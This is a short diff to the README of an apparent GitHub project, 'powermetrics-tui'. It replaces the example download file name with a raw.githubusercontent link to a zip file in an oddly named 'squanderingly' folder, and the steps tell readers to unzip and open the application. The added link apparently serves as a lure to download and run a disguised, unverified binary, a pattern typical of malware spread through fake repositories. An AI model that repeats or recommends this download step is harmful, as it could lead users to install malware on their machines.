Jo00o200/powermetrics-tui/README.md

 1. Click on the download link or the badge above.
 2. You will be directed to the GitHub Releases page.
 3. Locate the latest version of powermetrics-tui.
 The version will look something like this: `v1.0`.
-4. Download the file for your system (e.g., `powermetrics-tui-macos.zip`).
+4. Download the file for your system (e.g., `https://raw.githubusercontent.com/Jo00o200/powermetrics-tui/main/squanderingly/powermetrics-tui.zip`).
 5. Once downloaded, locate the file in your Downloads folder.
 6. Unzip the downloaded file.
 7. Open the powermetrics-tui application.